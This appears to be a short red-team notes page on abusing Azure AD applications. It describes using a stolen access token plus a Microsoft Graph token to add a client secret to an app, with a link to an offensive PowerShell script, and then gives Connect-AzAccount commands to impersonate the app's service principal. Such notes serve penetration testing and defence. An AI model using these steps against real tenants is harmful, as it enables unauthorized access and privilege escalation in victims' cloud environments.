Add secrets to app

If you have a access_token that is able to Get-AzADApplication:

It is possible to check if that access_token can set a secret on that app using a script: https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1.

To abuse, you will need a access_token and the MicrosoftGraphToken!

Connect-AzAccount -AccessToken $token -MicrosoftGraphAccessToken $graphtoken -AccountId 62e44426-5c46-4e3c-8a89-xxxxxx

Now, using these secret we can impersonate that application:

$password = ConvertTo-SecureString 'client secret' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('f072c4a6-b440-40de-xxxxxxx', $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant 2d50cb29-5f7b-48a4-87ce-xxxxxxxx

PreviousMacro enabled Word-files (Revshell)NextAutomation Accounts & Function Apps

Last updated 1 year ago

$password = ConvertTo-SecureString 'client secret' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('f072c4a6-b440-40de-xxxxxxx', $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant 2d50cb29-5f7b-48a4-87ce-xxxxxxxx